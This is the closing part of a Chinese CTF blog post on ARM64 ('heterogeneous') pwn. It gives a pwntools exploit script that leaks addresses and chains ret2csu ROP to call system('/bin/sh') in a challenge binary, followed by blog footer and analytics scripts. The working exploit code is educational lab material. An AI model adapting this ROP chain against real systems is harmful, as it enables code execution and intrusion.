<span class="hljs-keyword">import</span> inspect
<span class="hljs-keyword">from</span> sys <span class="hljs-keyword">import</span> argv

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">ret2libc</span>(<span class="hljs-params">leak, func, path=<span class="hljs-string">&#x27;&#x27;</span></span>):</span>
    <span class="hljs-keyword">if</span> path == <span class="hljs-string">&#x27;&#x27;</span>:
        libc = LibcSearcher(func, leak)
        base = leak - libc.dump(func)
        system = base + libc.dump(<span class="hljs-string">&#x27;system&#x27;</span>)
        binsh = base + libc.dump(<span class="hljs-string">&#x27;str_bin_sh&#x27;</span>)
    <span class="hljs-keyword">else</span>:
        libc = ELF(path)
        base = leak - libc.sym[func]
        system = base + libc.sym[<span class="hljs-string">&#x27;system&#x27;</span>]
        binsh = base + <span class="hljs-built_in">next</span>(libc.search(<span class="hljs-string">b&#x27;/bin/sh&#x27;</span>))
    <span class="hljs-keyword">return</span> (base, system, binsh,)

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">leak</span>(<span class="hljs-params">var</span>):</span>
    callers_local_vars = inspect.currentframe().f_back.f_locals.items()
    temp =  [var_name <span class="hljs-keyword">for</span> var_name, var_val <span class="hljs-keyword">in</span> callers_local_vars <span class="hljs-keyword">if</span> var_val <span class="hljs-keyword">is</span> var][<span class="hljs-number">0</span>]
    p.info(temp + <span class="hljs-string">&#x27;: &#123;:#x&#125;&#x27;</span>.<span class="hljs-built_in">format</span>(var))

s      = <span class="hljs-keyword">lambda</span> data               :p.send(data) 
sa      = <span class="hljs-keyword">lambda</span> delim,data         :p.sendafter(delim, data)
sl      = <span class="hljs-keyword">lambda</span> data               :p.sendline(data)
sla     = <span class="hljs-keyword">lambda</span> delim,data         :p.sendlineafter(delim, data)
r      = <span class="hljs-keyword">lambda</span> numb=<span class="hljs-number">4096</span>          :p.recv(numb)
ru      = <span class="hljs-keyword">lambda</span> delims, drop=<span class="hljs-literal">True</span>  :p.recvuntil(delims, drop)
uu32    = <span class="hljs-keyword">lambda</span> data               :u32(data.ljust(<span class="hljs-number">4</span>, <span class="hljs-string">b&#x27;\0&#x27;</span>))
uu64    = <span class="hljs-keyword">lambda</span> data               :u64(data.ljust(<span class="hljs-number">8</span>, <span class="hljs-string">b&#x27;\0&#x27;</span>))
plt     = <span class="hljs-keyword">lambda</span> data               :elf.plt[data]
got     = <span class="hljs-keyword">lambda</span> data               :elf.got[data]
sym     = <span class="hljs-keyword">lambda</span> data               :libc.sym[data]
itr     = <span class="hljs-keyword">lambda</span>                    :p.interactive()

binary = <span class="hljs-string">&#x27;./HelloARM&#x27;</span>
context.binary = binary

elf = ELF(binary,checksec=<span class="hljs-literal">False</span>)
libc = elf.libc
<span class="hljs-comment"># p = process(&#x27;./HelloARM&#x27;)</span>
context.terminal = [<span class="hljs-string">&#x27;tmux&#x27;</span>,<span class="hljs-string">&#x27;splitw&#x27;</span>,<span class="hljs-string">&#x27;-h&#x27;</span>]
<span class="hljs-comment"># cmd = &#x27;b *0x400ad0\n&#x27;</span>
cmd = <span class="hljs-string">&#x27;b *0x400ad0\n&#x27;</span>
<span class="hljs-comment"># cmd = &#x27;b *0x4009cc\n&#x27;</span>
<span class="hljs-comment"># cmd+= &#x27;b *0x400970\n&#x27;</span>
p = gdb.debug(context.binary.path,cmd)

<span class="hljs-keyword">if</span> <span class="hljs-built_in">len</span>(argv) &gt; <span class="hljs-number">1</span>:
    <span class="hljs-keyword">if</span> argv[<span class="hljs-number">1</span>]==<span class="hljs-string">&#x27;r&#x27;</span>:
        <span class="hljs-comment"># p = remote(&#x27;10.104.255.211&#x27;,7777)</span>
        p = remote(<span class="hljs-string">&#x27;127.0.0.1&#x27;</span>,<span class="hljs-number">10003</span>)


<span class="hljs-comment"># start </span>
context.log_level = <span class="hljs-string">&#x27;DEBUG&#x27;</span>

<span class="hljs-comment"># --------------------------- 1 接收栈地址</span>
ru(<span class="hljs-string">&quot;number:&quot;</span>)
magic = <span class="hljs-built_in">int</span>(r(<span class="hljs-number">12</span>),<span class="hljs-number">16</span>)

write_plt = plt(<span class="hljs-string">&#x27;write&#x27;</span>)
write_got = got(<span class="hljs-string">&#x27;write&#x27;</span>)
system = sym(<span class="hljs-string">&#x27;system&#x27;</span>)
binsh = <span class="hljs-number">0x411080</span>
vul_addr = <span class="hljs-number">0x4009cc</span> <span class="hljs-comment"># 需要回到main，如果回到ooo的话无法覆盖返回值</span>
leak(magic)
leak(write_got)
sla(<span class="hljs-string">&#x27;name:&#x27;</span>,<span class="hljs-string">&#x27;/bin/sh\x00&#x27;</span>)
<span class="hljs-comment"># --------------------------- 2 第一次rop 执行write_plt(0,write_got,0x20) 泄露libc基址</span>
<span class="hljs-comment"># padding</span>
pl = <span class="hljs-string">&#x27;a&#x27;</span>*<span class="hljs-number">0x100</span>
<span class="hljs-comment"># 填充main函数的栈基址和返回值地址   ret2csu</span>
pl+= p64(magic)+p64(<span class="hljs-number">0x400ad0</span>)
<span class="hljs-comment"># 因为‘ooooooo’函数返回时令sp+0x110 因此要先填充</span>
<span class="hljs-comment"># x19 &amp; padding</span>
pl+= p64(write_plt).ljust(<span class="hljs-number">0x20</span>,<span class="hljs-string">&#x27;a&#x27;</span>) + p64(<span class="hljs-number">0</span>) +<span class="hljs-string">&#x27;a&#x27;</span>*<span class="hljs-number">0xe8</span>
<span class="hljs-comment"># 根据ret2csu进行构造</span>
<span class="hljs-string">&#x27;&#x27;&#x27;</span>
<span class="hljs-string">x19 = 0</span>
<span class="hljs-string">x20 = 1</span>
<span class="hljs-string">x21 = call</span>
<span class="hljs-string">x22 = arg1</span>
<span class="hljs-string">x23 = arg2</span>
<span class="hljs-string">x24 = arg3</span>
<span class="hljs-string">&#x27;&#x27;&#x27;</span>
<span class="hljs-comment"># 基址和返回值地址（需要可读地址）</span>
pl+= p64(magic) + p64(<span class="hljs-number">0x400ab0</span>)
<span class="hljs-comment"># padding and x20</span>
pl+= p64(<span class="hljs-number">0</span>) + p64(<span class="hljs-number">1</span>) 
<span class="hljs-comment"># puts(plt_got,0,0)</span>
<span class="hljs-comment"># 要注意csu中取的是x21中地址的值</span>
pl+= p64(magic<span class="hljs-number">-0x10</span>) + p64(<span class="hljs-number">1</span>) + p64(write_got) + p64(<span class="hljs-number">0x20</span>)
<span class="hljs-comment"># 第二轮</span>
<span class="hljs-comment"># 返回main函数</span>
pl+= p64(magic) + p64(vul_addr)
sa(<span class="hljs-string">&#x27;message:&#x27;</span>,pl)
ru(<span class="hljs-string">&#x27;\n&#x27;</span>)
write_addr = uu64(r(<span class="hljs-number">5</span>))
base = write_addr - sym(<span class="hljs-string">&#x27;write&#x27;</span>)
leak(base)
system += base
leak(system) 

<span class="hljs-comment"># ----------------------------------------- 3 第二次rop 执行system(&#x27;/bin/sh&#x27;)</span>
sla(<span class="hljs-string">&#x27;name:&#x27;</span>,<span class="hljs-string">&#x27;/bin/sh\x00&#x27;</span>)
pl = <span class="hljs-string">&#x27;a&#x27;</span>*<span class="hljs-number">0x100</span>
pl+= p64(magic+<span class="hljs-number">0x180</span>) + p64(<span class="hljs-number">0x400ad0</span>)
pl+= p64(system).ljust(<span class="hljs-number">0x20</span>,<span class="hljs-string">&#x27;a&#x27;</span>) + p64(<span class="hljs-number">0</span>) +<span class="hljs-string">&#x27;a&#x27;</span>*<span class="hljs-number">0xe8</span>
pl+= p64(magic) + p64(<span class="hljs-number">0x400ab0</span>)
pl+= p64(<span class="hljs-number">0</span>) + p64(<span class="hljs-number">1</span>) 
pl+= p64(magic+<span class="hljs-number">0x70</span>) + p64(binsh) + p64(<span class="hljs-number">0</span>) + p64(<span class="hljs-number">0</span>)

sa(<span class="hljs-string">&#x27;message:&#x27;</span>,pl)

itr()</code></pre></div>




            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/CTF/">CTF</a>
                    
                      <a class="hover-with-bg" href="/categories/CTF/PWN/">PWN</a>
                    
                      <a class="hover-with-bg" href="/categories/CTF/PWN/%E5%BC%82%E6%9E%84/">异构</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/CTF-PWN-%E5%BC%82%E6%9E%84/">CTF,PWN,异构</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！</p>
              
              
                <div class="post-prevnext row">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2020/11/11/%E5%BC%82%E6%9E%84%20PWN%200x1%20%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA/">
                        <span class="hidden-mobile">异构 PWN 0x1 环境搭建</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
              <!-- Comments -->
              <article class="comments" id="comments">
                
                
  <div id="vcomments"></div>
  <script type="text/javascript">
    function loadValine() {
      addScript('https://cdn.staticfile.org/valine/1.4.14/Valine.min.js', function () {
        new Valine({
          el: "#vcomments",
          app_id: "BC8977lXvuPHlruJsv3NsMKh-gzGzoHsz",
          app_key: "U5wynESljzvPrIHxNglF7gF1",
          placeholder: "Say Something.",
          path: window.location.pathname,
          avatar: "retro",
          meta: ["nick","mail","link"],
          pageSize: "10",
          lang: "zh-CN",
          highlight: true,
          recordIP: false,
          serverURLs: "https://bc8977lx.lc-cn-n1-shared.com",
        });
      });
    }
    waitElementVisible('vcomments', loadValine);
  </script>
  <noscript>Please enable JavaScript to view the <a target="_blank" href="https://valine.js.org" rel="nofollow noopener noopener">comments
      powered by Valine.</a></noscript>


              </article>
            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div id="tocbot"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    
  </main>

  
    <a id="scroll-top-button" href="#" role="button">
      <i class="iconfont icon-arrowup" aria-hidden="true"></i>
    </a>
  

  
    <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
  

  

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a><span>谨以此让当下逝去的时光得以隽永.</span></a> 
  </div>
  
  <div class="statistics">
    
    

    
      
        <!-- LeanCloud 统计PV -->
        <span id="leancloud-site-pv-container" style="display: none">
            总访问量 
            <span id="leancloud-site-pv"></span>
             次
          </span>
      
      
        <!-- LeanCloud 统计UV -->
        <span id="leancloud-site-uv-container" style="display: none">
            总访客数 
            <span id="leancloud-site-uv"></span>
             人
          </span>
      

    
  </div>


  

  
</footer>

<!-- SCRIPTS -->
<script  src="https://cdn.staticfile.org/jquery/3.4.1/jquery.min.js" ></script>
<script  src="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/main.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  



  <script defer src="https://cdn.staticfile.org/clipboard.js/2.0.6/clipboard.min.js" ></script>
  <script  src="/js/clipboard-use.js" ></script>



  <script defer>
  (function () {
    // 查询存储的记录
    function getRecord(Counter, target) {
      return new Promise(function (resolve, reject) {
        Counter('get', '/classes/Counter?where=' + encodeURIComponent(JSON.stringify({target})))
          .then(resp => resp.json())
          .then(({results, code, error}) => {
            if (code === 401) {
              throw error;
            }
            if (results && results.length > 0) {
              var record = results[0];
              resolve(record);
            } else {
              Counter('post', '/classes/Counter', {target, time: 0})
                .then(resp => resp.json())
                .then((record, error) => {
                  if (error) {
                    throw error;
                  }
                  resolve(record);
                }).catch(error => {
                console.error('Failed to create', error);
                reject(error);
              });
            }
          }).catch((error) => {
          console.error('LeanCloud Counter Error:', error);
          reject(error);
        });
      })
    }

    // 发起自增请求
    function increment(Counter, incrArr) {
      return new Promise(function (resolve, reject) {
        Counter('post', '/batch', {
          "requests": incrArr
        }).then((res) => {
          res = res.json();
          if (res.error) {
            throw res.error;
          }
          resolve(res);
        }).catch((error) => {
          console.error('Failed to save visitor count', error);
          reject(error);
        });
      });
    }

    // 构建自增请求体
    function buildIncrement(objectId) {
      return {
        "method": "PUT",
        "path": `/1.1/classes/Counter/${ objectId }`,
        "body": {
          "time": {
            '__op': 'Increment',
            'amount': 1
          }
        }
      }
    }

    // 校验是否为有效的 UV
    function validUV() {
      var key = 'LeanCloud_UV_Flag';
      var flag = localStorage.getItem(key);
      if (flag) {
        // 距离标记小于 24 小时则不计为 UV
        if (new Date().getTime() - parseInt(flag) <= 86400000) {
          return false;
        }
      }
      localStorage.setItem(key, new Date().getTime().toString());
      return true;
    }

    function addCount(Counter) {
      var enableIncr = 'true' === 'true' && window.location.hostname !== 'localhost';
      var getterArr = [];
      var incrArr = [];

      // 请求 PV 并自增
      var pvCtn = document.querySelector('#leancloud-site-pv-container');
      if (pvCtn || enableIncr) {
        var pvGetter = getRecord(Counter, 'site-pv').then((record) => {
          incrArr.push(buildIncrement(record.objectId))
          var ele = document.querySelector('#leancloud-site-pv');
          if (ele) {
            ele.innerText = record.time + 1;
            if (pvCtn) {
              pvCtn.style.display = 'inline';
            }
          }
        });
        getterArr.push(pvGetter);
      }

      // 请求 UV 并自增
      var uvCtn = document.querySelector('#leancloud-site-uv-container');
      if (uvCtn || enableIncr) {
        var uvGetter = getRecord(Counter, 'site-uv').then((record) => {
          var vuv = validUV();
          vuv && incrArr.push(buildIncrement(record.objectId))
          var ele = document.querySelector('#leancloud-site-uv');
          if (ele) {
            ele.innerText = record.time + (vuv ? 1 : 0);
            if (uvCtn) {
              uvCtn.style.display = 'inline';
            }
          }
        });
        getterArr.push(uvGetter);
      }

      // 如果是文章，请求文章的浏览数，并自增
      if ('true' === 'true') {
        var viewCtn = document.querySelector('#leancloud-post-views-container');
        if (viewCtn || enableIncr) {
          var target = decodeURI('/2020/11/12/%E5%BC%82%E6%9E%84%20PWN%200x2%20%E5%85%A5%E9%97%A8/');
          var viewGetter = getRecord(Counter, target).then((record) => {
            incrArr.push(buildIncrement(record.objectId))
            if (viewCtn) {
              var ele = document.querySelector('#leancloud-post-views');
              if (ele) {
                ele.innerText = (record.time || 0) + 1;
                viewCtn.style.display = 'inline';
              }
            }
          });
          getterArr.push(viewGetter);
        }
      }

      // 如果启动计数自增，批量发起自增请求
      if (enableIncr) {
        Promise.all(getterArr).then(() => {
          incrArr.length > 0 && increment(Counter, incrArr);
        })
      }
    }

    var app_id = 'BC8977lXvuPHlruJsv3NsMKh-gzGzoHsz'
    var app_key = 'U5wynESljzvPrIHxNglF7gF1'
    var server_url = 'https://bc8977lx.lc-cn-n1-shared.com'

    function fetchData(api_server) {
      var Counter = (method, url, data) => {
        return fetch(`${ api_server }/1.1${ url }`, {
          method,
          headers: {
            'X-LC-Id': app_id,
            'X-LC-Key': app_key,
            'Content-Type': 'application/json',
          },
          body: JSON.stringify(data)
        });
      };

      addCount(Counter);
    }

    var api_server = app_id.slice(-9) !== '-MdYXbMMI' ? server_url : `https://${ app_id.slice(0, 8).toLowerCase() }.api.lncldglobal.com`;

    if (api_server) {
      fetchData(api_server);
    } else {
      fetch('https://app-router.leancloud.cn/2/route?appId=' + app_id)
        .then(resp => resp.json())
        .then(({api_server}) => {
          fetchData('https://' + api_server);
        });
    }
  })();
</script>






  <script  src="https://cdn.staticfile.org/tocbot/4.11.1/tocbot.min.js" ></script>
  <script>
    $(document).ready(function () {
      var boardCtn = $('#board-ctn');
      var boardTop = boardCtn.offset().top;

      tocbot.init({
        tocSelector: '#tocbot',
        contentSelector: '#post-body',
        headingSelector: 'h1,h2,h3,h4,h5,h6',
        linkClass: 'tocbot-link',
        activeLinkClass: 'tocbot-active-link',
        listClass: 'tocbot-list',
        isCollapsedClass: 'tocbot-is-collapsed',
        collapsibleClass: 'tocbot-is-collapsible',
        collapseDepth: 0,
        scrollSmooth: true,
        headingsOffset: -boardTop
      });
      if ($('.toc-list-item').length > 0) {
        $('#toc').css('visibility', 'visible');
      }
    });
  </script>



  <script  src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js" ></script>
  <script>
    var typed = new Typed('#subtitle', {
      strings: [
        '  ',
        "异构 PWN 0x2 入门&nbsp;",
      ],
      cursorChar: "_",
      typeSpeed: 70,
      loop: false,
    });
    typed.stop();
    $(document).ready(function () {
      $(".typed-cursor").addClass("h2");
      typed.start();
    });
  </script>



  <script  src="https://cdn.staticfile.org/anchor-js/4.2.2/anchor.min.js" ></script>
  <script>
    anchors.options = {
      placement: "right",
      visible: "hover",
      
    };
    var el = "h1,h2,h3,h4,h5,h6".split(",");
    var res = [];
    for (item of el) {
      res.push(".markdown-body > " + item)
    }
    anchors.add(res.join(", "))
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    var path = "/local-search.xml";
    var inputArea = document.querySelector("#local-search-input");
    inputArea.onclick = function () {
      searchFunc(path, 'local-search-input', 'local-search-result');
      this.onclick = null
    }
  </script>



  <script  src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css" />

  <script>
    $('#post img:not(.no-zoom img, img[no-zoom]), img[zoom]').each(
      function () {
        var element = document.createElement('a');
        $(element).attr('data-fancybox', 'images');
        $(element).attr('href', $(this).attr('src'));
        $(this).wrap(element);
      }
    );
  </script>












  

  

  

  

  

  





</body>
</html>
